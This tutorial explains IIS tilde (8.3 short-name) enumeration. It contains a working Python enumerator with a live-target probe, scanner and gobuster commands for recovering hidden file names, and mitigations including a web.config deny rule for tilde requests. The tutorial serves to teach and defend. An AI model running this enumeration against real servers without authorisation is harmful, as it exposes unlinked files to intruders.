23. IIS Tilde Enumeration

1. IIS Tilde Enumeration Concept

  • Windows (NTFS) generates an 8.3 short name for every file and directory whose long name does not already fit the 8.3 format, and IIS resolves paths given in that short form.

  • A request for a short-name pattern containing the tilde (~) is answered differently depending on whether a matching name exists, so names can be recovered one character at a time.

  • This uncovers files and directories that were never linked or listed.

  • The 8.3 format allows up to 8 characters for the name and up to 3 for the extension, all upper-cased. A truncated name keeps the first six legal characters of the long name followed by ~N; an extension is cut to three characters.

    • Example: SecretDocuments becomes SECRET~1

    • Example file: transferlog.txt becomes TRANSF~1.TXT

    • A name that already fits, such as index.htm, gets no tilde name and cannot be found this way.

  • If two names share the same first six characters and extension, the number after the tilde increments (~2, ~3, ~4); after four collisions Windows switches to a hashed form (roughly the first two characters plus four hash characters, then ~1), which character-by-character guessing recovers poorly.

  • Affected Versions: IIS 5.0, IIS 6.0, IIS 7.0, IIS 7.5, IIS 8.0, IIS 8.5. The status codes that distinguish a hit from a miss vary by version and configuration, so confirm the leak on each target rather than inferring it from the version banner.


2. Enumeration Process

  1. Send requests for short-name patterns such as /a*~1*/.aspx, one candidate character at a time.

  2. Compare the responses: an affected server answers a prefix that matches an existing short name differently from one that does not (classically 404 Not Found for a match and 400 Bad Request for no match on IIS 6). The signal is the difference between two error responses, not a 200 OK.

  3. Extend the prefix character by character, then do the same for the extension, until the full short name is recovered (for example TRANSF~1.ASP).

  4. Use the recovered short name as the prefix for guessing the full long name with a wordlist, then request the full name; direct requests for the 8.3 form are often refused.
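The loop above, written out in Python as an added example (this is not code from the page or from the IIS ShortName Scanner project). The probe format /PREFIX*~N*/.aspx and the 404-versus-400 split are the classic IIS 6 behaviour; the fake web root, its file names and the status codes are constructed so the example runs offline, and `http_probe` is a minimal real-target replacement that assumes nothing beyond plain GET requests. The character set and the completeness checks are simplified compared with the real scanner.

```python
"""IIS tilde (8.3 short-name) enumeration reduced to its core loop.

Probe URLs look like /<prefix>*~1*/.aspx . On an affected IIS the answer
differs depending on whether a file or directory whose short name starts with
<prefix> exists (classically 404 for a hit and 400 for a miss on IIS 6), so
names are recovered one character at a time without ever seeing a 200 OK.
"""
import fnmatch
import re
import string
import urllib.error
import urllib.request

CHARSET = string.ascii_uppercase + string.digits + "_-"  # short names are upper-cased
MAX_TILDE = 4   # ~1..~4; after that NTFS switches to hash-based short names


def short_name(long_name, taken):
    """Approximate NTFS 8.3 generation. `taken` holds names already issued in
    the same directory so that collisions get ~2, ~3, ... (constructed model)."""
    name = long_name.upper()
    base, ext = (name.rsplit(".", 1) if "." in name else (name, ""))
    clean = lambda s: re.sub(r"[^A-Z0-9_\-]", "", s)
    if base and clean(base) == base and clean(ext) == ext and len(base) <= 8 and len(ext) <= 3:
        taken.add(name)          # already fits 8.3: NTFS creates no tilde name
        return name
    base, ext = clean(base)[:6], clean(ext)[:3]
    suffix = f".{ext}" if ext else ""
    n = 1
    while f"{base}~{n}{suffix}" in taken:
        n += 1
    taken.add(f"{base}~{n}{suffix}")
    return f"{base}~{n}{suffix}"


def make_fake_iis(long_names, hit=404, miss=400):
    """Constructed stand-in for a vulnerable IIS 6 web root (sample data, not a
    real server): a probe hits when its wildcard pattern matches any short name."""
    taken = set()
    shorts = [short_name(n, taken) for n in long_names]

    def probe(path):
        pattern = path.strip("/").split("/")[0].upper()   # "/TR*~1*/.aspx" -> "TR*~1*"
        return hit if any(fnmatch.fnmatchcase(s, pattern) for s in shorts) else miss
    return probe


def http_probe(base_url, timeout=5):
    """Probe a live target (assumed hypothetical here): status of GET base_url + path."""
    def probe(path):
        try:
            with urllib.request.urlopen(base_url.rstrip("/") + path, timeout=timeout) as r:
                return r.status
        except urllib.error.HTTPError as err:
            return err.code
    return probe


def calibrate(probe):
    """Does the target leak? A pattern that matches any tilde name must be answered
    differently from one that cannot match (a 10-character base never exists in 8.3
    form). Returns the status that signals a hit, or None when there is no difference."""
    hit, miss = probe("/*~1*/.aspx"), probe("/ZZZZZZZZZZ*~1*/.aspx")
    return hit if hit != miss else None


def enumerate_short_names(probe, hit):
    """Depth-first recovery of every 8.3 name the server leaks, returned sorted."""
    found = []

    def walk_ext(base, ext):
        extended = False
        if len(ext) < 3:
            for c in CHARSET:
                if probe(f"/{base}.{ext}{c}*/.aspx") == hit:
                    extended = True
                    walk_ext(base, ext + c)
        if ext and not extended:
            found.append(f"{base}.{ext}")

    def walk(prefix, n):
        # /PREFIX~N*/ only matches when nothing sits between PREFIX and ~N,
        # i.e. the base name is complete; then look for an extension.
        if prefix and probe(f"/{prefix}~{n}*/.aspx") == hit:
            if probe(f"/{prefix}~{n}.*/.aspx") == hit:
                walk_ext(f"{prefix}~{n}", "")
            else:
                found.append(f"{prefix}~{n}")   # directory or extension-less file
        if len(prefix) < 6:                     # six characters plus ~N fill the 8-char base
            for c in CHARSET:
                if probe(f"/{prefix}{c}*~{n}*/.aspx") == hit:
                    walk(prefix + c, n)

    for n in range(1, MAX_TILDE + 1):
        walk("", n)
    return sorted(found)


# Constructed web root for the demo; "uploads" fits 8.3 and so never leaks.
SAMPLE_SITE = ["SecretDocuments", "transfer.aspx", "transferlog.txt",
               "web.config", "index.html", "uploads"]

if __name__ == "__main__":
    probe = make_fake_iis(SAMPLE_SITE)        # swap for http_probe("http://<target_ip>/")
    hit = calibrate(probe)
    print("leaks short names:", hit is not None)
    for s in enumerate_short_names(probe, hit):
        print(s)
```

Against the constructed root the run reports INDEX~1.HTM, SECRET~1, TRANSF~1.ASP, TRANSF~1.TXT and WEB~1.CON, and nothing for uploads. Note what the result does and does not give you: TRANSF~1.ASP narrows the full name to something starting with "transf" and ending in an extension beginning with "asp", which is exactly the prefix the wordlist step below keys on. Run `calibrate` first on a real host; if it returns None the server answers hits and misses the same way and the character loop would only generate noise.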


3. Enumeration Commands and Tools

Nmap Port and Service Scan

nmap -p- -sV -sC --open <target_ip>
  • Scans all ports, performs service version detection, runs default scripts, and displays open ports.

IIS ShortName Scanner (Java)

java -jar iis_shortname_scanner.jar 0 5 http://<target_ip>/
  • Automates the whole loop: first checks whether the target answers hits and misses differently, then recovers every short name in the given directory.

  • Requires Java to be installed; the jar is from the irsdl/IIS-ShortName-Scanner project.

Wordlist Generation (egrep and sed)

egrep -r ^transf /usr/share/wordlists/* | sed 's/^[^:]*://' > /tmp/list.txt
  • Builds a candidate list of full names from the prefix recovered in a short name (here TRANSF~1 gives transf): every wordlist entry starting with transf is kept, and sed strips the file name that grep prefixes to each match when it searches more than one file. egrep matches case-sensitively, so use a prefix in the case your wordlists use, or add -i.

Gobuster Directory Bruteforcing

gobuster dir -u http://<target_ip>/ -w /tmp/list.txt -x .aspx,.asp
  • Requests every candidate with each extension appended (transfer.aspx, transfer.asp, ...) to find the long name behind the short one. Pick the extensions from the short name's three-letter extension: ASP can stand for .asp or .aspx.


4. Command Breakdown

Nmap:

  • -p- : Scan all ports.

  • -sV : Perform service version detection.

  • -sC : Run default scripts.

  • --open : Show only open ports.

IIS ShortName Scanner:

  • 0 : Progress/verbosity level (0 prints only the final results; higher values add progress and per-request output).

  • 5 : Number of parallel scanning threads.

  • http://<target_ip>/ : Target URL. The last path component is scanned as a directory, so end it with a slash and rerun it against sub-directories you discover.

egrep:

  • -r : Recursive search.

  • ^transf : Lines starting with "transf".

sed:

  • 's/^[^:]*://' : Remove everything up to and including the first colon, i.e. the file name and colon that grep adds in front of each match.

Gobuster:

  • -u : Target URL.

  • -w : Wordlist file.

  • -x : File extensions to append to every wordlist entry.


5. Practical Example

Sample Enumeration Output:

200 OK - /SECRET~1
200 OK - /DOCUME~1/FILE.TXT
403 Forbidden - /ADMIN~1

These are direct requests for recovered short names on a server that still serves the 8.3 form. The output suggests:

  • /SECRET~1 is a valid directory that can be browsed by its short name.

  • /DOCUME~1/FILE.TXT is an accessible file.

  • /ADMIN~1 exists but is restricted.

Where the server refuses the short form, the short name is still useful: treat it as the prefix for wordlist guessing with gobuster as above.


6. Mitigation Strategies

  • Disable 8.3 short-name generation on the server:

    fsutil behavior set disable8dot3 1

    This stops new short names from being created; names already on disk keep their 8.3 form until they are stripped, so check the web root afterwards.

  • Block requests that contain a tilde, using IIS Request Filtering (denyUrlSequences) or a URL Rewrite rule, so that short-name probes never reach the file system.

  • Harden the IIS configuration: directory listing off, least-privilege NTFS permissions on the web root.

  • Keep IIS patched, but do not rely on updates alone: the leak comes from 8.3 names plus request handling, so the two settings above are what close it.
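A web.config fragment for the request-filtering approach, added here as an example (it is not from the page and not a vendor-supplied file). It makes IIS reject any request whose URL path contains a tilde with 404.5 (URL sequence denied) before a handler sees it. Check that no application on the site legitimately uses ~ in URL paths before deploying it, and pair it with the file-system fix: fsutil behavior set disable8dot3 1 only stops new short names, existing ones stay until removed, for example with fsutil 8dot3name strip /s /v C:\inetpub\wwwroot (path assumed).

```xml
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <security>
      <requestFiltering>
        <!-- Every short-name probe carries a tilde; deny the sequence outright. -->
        <denyUrlSequences>
          <add sequence="~" />
        </denyUrlSequences>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
```

Put the fragment in the site's root web.config, or in applicationHost.config to cover every site on the host; the scanner's calibration step (an existing pattern versus an impossible one) is a quick way to confirm afterwards that both kinds of probe now get the same answer.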


7. Key Points

  • IIS tilde enumeration abuses an information leak: an affected IIS answers a URL that matches an existing 8.3 short name differently from one that does not, so names can be recovered one character at a time.

  • Tools like IIS ShortName Scanner and Gobuster automate the process: the scanner recovers the short names, Gobuster guesses the full names.

  • Wordlists filtered by the recovered prefix keep the guessing small.

  • Nmap is used for initial port and service enumeration.

  • Java is required to run the IIS short name scanner.

  • Only names that do not already fit 8.3 (longer than eight characters, or with an extension longer than three) get a tilde name; a name like index.htm does not leak this way.

  • Disabling 8.3 name creation, stripping existing short names and rejecting tilde requests close the leak.
